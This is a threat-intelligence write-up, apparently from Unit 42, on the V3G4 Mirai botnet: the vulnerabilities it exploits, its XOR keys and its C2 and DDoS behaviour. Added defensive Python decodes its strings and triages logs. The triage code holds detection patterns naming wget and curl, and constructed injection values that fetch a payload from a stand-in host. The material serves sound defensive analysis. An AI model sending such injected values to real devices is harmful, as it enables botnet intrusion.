We are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.
From July to December 2022, Unit 42 researchers observed a Mirai variant called V3G4, which was leveraging several vulnerabilities to spread itself. The vulnerabilities exploited include the following:
- CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability
- Gitorious Remote Command Execution Vulnerability
- CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability
- Mitel AWC Remote Command Execution Vulnerability
- CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability
- CVE-2019-15107: Webmin Command Injection Vulnerability
- Spree Commerce Arbitrary Command Execution Vulnerability
- FLIR Thermal Camera Remote Command Execution Vulnerability
- CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability
- CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability
- CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability
- CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability
- CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability
Once the vulnerable devices are compromised, they will be fully controlled by attackers and become a part of the botnet. The threat actor has the capability to utilize those devices to conduct further attacks, such as distributed denial-of-service (DDoS) attacks. The exploit attempts captured by Unit 42 researchers leverage the aforementioned vulnerabilities to spread V3G4, which targets exposed servers and networking devices running Linux.
Palo Alto Networks Next-Generation Firewall customers receive protections through cloud-delivered security services such as IoT Security, Advanced Threat Prevention, WildFire, and Advanced URL Filtering, which can help detect and block the exploit traffic and malware.
Related Unit 42 Topics: Mirai, IoT
Since July 2022, Unit 42 researchers have observed three campaigns utilizing the Mirai V3G4 variant. Based on our analysis, we believe the campaigns were operated by the same threat actor for the following reasons:
- The hardcoded command and control (C2) domains among these three campaigns contain the same string (8xl9)
- The malware shell script downloaders are almost identical between the three campaigns
- The botnet client samples use the same XOR decryption key
- The botnet client samples use the same “stop list” (a list of target processes that the botnet client searches for and terminates)
- The botnet client samples use almost identical functions
The threat actor exploited 13 vulnerabilities that could lead to remote code execution. Upon successful exploitation, the wget and curl utilities are automatically executed to download Mirai client samples from malware infrastructure and then execute the downloaded bot clients.
The utilized vulnerabilities are listed in Figure 1 below, and the detailed vulnerability information is listed in the Appendix section.
Based on behavior and patterns Unit 42 researchers observed during analysis of the downloaded botnet client samples, we believe that the botnet sample is a variant of the Mirai botnet.
Upon execution, the botnet client prints xXxSlicexXxxVEGA. to the console. The malware also contains a function that makes sure only one instance of this malware is executing on the infected device. If a botnet process already exists, the botnet client will simply print a string to the console and exit, as depicted in Figure 2.
The botnet client also contains a list of process names, and it tries to terminate those processes by checking the running process names on the infected host. The process names in that list belong to other botnet malware families and other Mirai variants. The full stop list is shown in Figure 3.
The V3G4 variant tries to connect to its hardcoded C2. This activity is shown in Figure 4.
Most Mirai variants use the same key for string encryption. However, this V3G4 variant uses different XOR encryption keys for different scenarios.
For strings related to botnet client execution, this V3G4 variant will first initialize an encrypted string table. It will then retrieve the encrypted string through an index (shown in Figures 5 and 6).
All the botnet client execution-related strings are decrypted with four rounds of XOR decryption (shown in Figure 7). The decryption keys used are the following:
- First round: 0xbc
- Second round: 0x69
- Third round: 0x3a
- Fourth round: 0xe6
V3G4 inherits its most significant feature from the original Mirai variant: a data section with embedded default login credentials for scanning and brute-force purposes. Like the original Mirai, it also encrypts all credentials with XOR key 0x37.
The V3G4 variant initializes the table of telnet/SSH login credentials in the scanner function. It then spreads itself through brute forcing network devices’ weak username/password combinations.
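The two string-encryption schemes described above (four XOR rounds for execution-related strings, key 0x37 for credentials) can be reproduced for sample triage. This is an added example, not code from Unit 42 or from the malware; it assumes strings are stored NUL-terminated, and the blob and its plaintext strings are constructed for illustration. It also shows that the four single-byte rounds fold into one XOR key, so ordinary single-byte XOR string sweeps recover the table.

```python
import re
from functools import reduce

# Keys as stated in the article: four rounds for execution-related strings,
# one key for the brute-force credential table.
EXEC_ROUND_KEYS = (0xBC, 0x69, 0x3A, 0xE6)
CRED_KEY = 0x37

def xor_rounds(data: bytes, keys) -> bytes:
    """Apply each single-byte XOR round in turn."""
    for key in keys:
        data = bytes(b ^ key for b in data)
    return data

def effective_key(keys) -> int:
    """Chained single-byte XOR rounds fold into one XOR with this value."""
    return reduce(lambda a, b: a ^ b, keys, 0)

def carve_strings(blob: bytes, key: int, min_len: int = 4):
    """XOR the blob with one key; return (offset, text) for NUL-terminated printable runs."""
    decoded = bytes(b ^ key for b in blob)
    hits = re.finditer(rb"[\x20-\x7e]{%d,}(?=\x00)" % min_len, decoded)
    return [(m.start(), m.group().decode("ascii")) for m in hits]

def build_constructed_sample() -> bytes:
    """Constructed blob (not from a real sample): two encrypted tables padded with 0xFF."""
    exec_strs = [b"c2.8xl9.example\x00", b"/proc/self/exe\x00"]  # constructed plaintexts
    creds = [b"admin\x00", b"default\x00"]                       # constructed plaintexts
    table1 = b"".join(xor_rounds(s, EXEC_ROUND_KEYS) for s in exec_strs)
    table2 = b"".join(xor_rounds(s, (CRED_KEY,)) for s in creds)
    return b"\xff" * 8 + table1 + b"\xff" * 8 + table2

if __name__ == "__main__":
    blob = build_constructed_sample()
    folded = effective_key(EXEC_ROUND_KEYS)
    print("folded execution-string key:", hex(folded))
    for key in (folded, CRED_KEY):
        print(hex(key), carve_strings(blob, key))
```

Requiring a NUL terminator after each printable run filters out most of the garbage that the wrong key produces, which is why each sweep returns only its own table.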
Before the botnet client establishes a connection with the C2 server, the malware will first initialize all DDoS attack functions (shown in Figure 9). Once the client establishes a connection with the C2 server, the threat actor can issue commands to the client to launch DDoS attacks.
We also noticed that the malware samples from the three campaigns we observed are slightly different. The original Mirai botnet sample spread itself by brute-forcing weak telnet/SSH credentials, whereas some Mirai variants utilize both brute-force and embedded exploits to spread themselves. However, samples from the September and December 2022 campaigns do not contain the vulnerability exploitation and credential brute-force functions (this is shown in Figure 10).
The vulnerabilities mentioned above have lower attack complexity than those used by previously observed variants, but they maintain a critical security impact that can lead to remote code execution. Once the attacker gains control of a vulnerable device in this manner, they could take advantage by including the newly compromised devices in their botnet to conduct further attacks such as DDoS. Therefore, it is highly recommended that patches and updates are applied when possible.
Palo Alto Networks customers receive protection from the vulnerabilities and malware discussed above through the following products and services:
- Next-Generation Firewalls with a Threat Prevention security subscription can help block the attacks with Best Practices via Threat Prevention signatures 56254, 56954, 92632, 55935, 55933, 58668, 35131, 55798, 57897, 56256, 55934, 93332 and 93392.
- Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect vulnerability exploits in real-time.
- WildFire can help stop the malware with static signature detections.
- Advanced URL Filtering and DNS Security are able to block the C2 domain and malware-hosting URLs.
- The Palo Alto Networks IoT Security platform can leverage network traffic information to identify the vendor, model and firmware version of a device and identify specific devices that are vulnerable to particular CVEs.
- In addition, IoT Security has inbuilt machine learning-based anomaly detection that can alert the customer if a device exhibits nontypical behavior such as a sudden appearance of traffic from a new source, an unusually high number of connections or an inexplicable surge of certain attributes typically appearing in IoT application payloads.
Campaign-related vulnerability information is listed below:
CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability
This malicious traffic was first detected as part of the V3G4 campaign on July 4, 2022. The exploit targets a command injection vulnerability in the FreePBX Elastix callme_startcall function, which does not successfully sanitize the user input in the callmenum parameter, leading to arbitrary command execution.
Gitorious Remote Command Execution Vulnerability
We captured this exploit traffic on July 4, 2022. The exploit works due to Gitorious’ insufficient input validation, which allows the attacker to exploit the vulnerability to launch a command injection.
CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability
We observed this malicious traffic on July 4, 2022. This remote command execution vulnerability is due to a failure to sanitize the value of the var:lang parameter in the cgi-bin/webcm interface of the FRITZ!Box Webcam.
Mitel AWC Remote Command Execution Vulnerability
This exploit traffic was detected on July 4, 2022. The exploit targets a remote command execution vulnerability in the Mitel audio, web and video conferencing (AWC) product. The server fails to adequately sanitize the user-supplied input data, which leads to remote command execution.
CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability
We detected this exploit traffic on July 4, 2022. The user input to Geutebruck IP Cameras’ testaction.cgi component is not correctly sanitized, allowing the attacker to run shell commands with root privilege.
CVE-2019-15107: Webmin Command Injection Vulnerability
This malicious traffic was detected on July 4, 2022. The exploit targets a command injection vulnerability in the password_change.cgi component within the Webmin product. The component does not successfully sanitize the parameters, which in turn can lead to arbitrary command execution.
Spree Commerce Arbitrary Command Execution Vulnerability
We observed this exploit traffic on July 4, 2022. The exploit targets the Spree Commerce product’s insufficient input validation, which the attacker can exploit to launch a remote command execution attack.
FLIR Thermal Camera Remote Command Execution Vulnerability
This exploit traffic was captured on July 4, 2022. The exploit works due to the FLIR Thermal Camera failing to sanitize user input, which in turn could lead to remote command execution.
CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability
We captured this exploit traffic on Sep. 13, 2022. The exploit targets the cgi-bin/mainfunction.cgi component of DrayTek Vigor. The component does not successfully sanitize the value of the HTTP parameter keyPath, which leads to remote command execution.
CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability
This malicious traffic was captured on Sep. 13, 2022. The exploit works due to the /cgi-bin/mainfunction.cgi/cvmcfgupload endpoint of DrayTek Vigor failing to sanitize the value of the HTTP parameter filename.
CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability
We detected this exploit traffic on Sep. 14, 2022. The exploit targets a remote command execution vulnerability in the Airspan AirSpot cgi-bin/diagnostics.cgi component. The component does not successfully sanitize the value of the HTTP parameter targetIP in the pingDiagnostic command.
CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability
This exploit traffic was captured on Sep. 12, 2022. An Object-Graph Navigation Language (OGNL) injection vulnerability exists in the Confluence Server and Data Center that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.
CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability
We observed this malicious traffic on Dec. 25, 2022. The exploit targets a remote code execution vulnerability in the diagnosis_config_save.php component of the C-Data Web management system. The component does not properly sanitize the values of the HTTP parameters iface and hostname, which in turn can lead to arbitrary command execution.
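For defenders reviewing web logs, the endpoint and parameter pairs named in this appendix can drive a simple triage pass. The following is an added example, not Unit 42's detection logic; it assumes the parameters are available URL-encoded in the logged request target or a captured body, the character set treated as suspicious is an assumption, and the request records are constructed using documentation address ranges.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Path fragment -> parameters the appendix names as unsanitized.
WATCHED = {
    "cgi-bin/webcm": {"var:lang"},
    "cgi-bin/mainfunction.cgi": {"keyPath"},
    "cgi-bin/mainfunction.cgi/cvmcfgupload": {"filename"},
    "cgi-bin/diagnostics.cgi": {"targetIP"},
    "diagnosis_config_save.php": {"iface", "hostname"},
}
# Shell metacharacters, or the downloaders the article says run after exploitation.
SUSPICIOUS = re.compile(r"[;|&`\r\n]|\$\(|\b(?:wget|curl)\b")

def triage(request_target: str, body: str = ""):
    """Return (parameter, decoded value) pairs that deserve an analyst's attention."""
    parts = urlsplit(request_target)
    watched = set()
    for fragment, names in WATCHED.items():
        if fragment in parts.path:
            watched |= names
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return [(k, v) for k, v in pairs if k in watched and SUSPICIOUS.search(v)]

# Constructed (request target, body) records for illustration only.
CONSTRUCTED_REQUESTS = [
    ("/cgi-bin/diagnostics.cgi?targetIP=192.0.2.7", ""),
    ("/cgi-bin/diagnostics.cgi?targetIP=192.0.2.7%3Bwget%20http%3A%2F%2F192.0.2.10%2Fx", ""),
    ("/diagnosis_config_save.php", "iface=eth0&hostname=%60curl%20192.0.2.10%60"),
    ("/search?hostname=a%3Bb", ""),  # same parameter name on an unwatched path
]

def flagged(records=CONSTRUCTED_REQUESTS):
    """Map each flagged request target to its suspicious parameters."""
    out = {}
    for target, body in records:
        hits = triage(target, body)
        if hits:
            out[target] = hits
    return out

if __name__ == "__main__":
    for target, hits in flagged().items():
        print(target, hits)
```

Scoping the check to the watched paths keeps the false-positive rate low, since the same parameter names appear in unrelated applications.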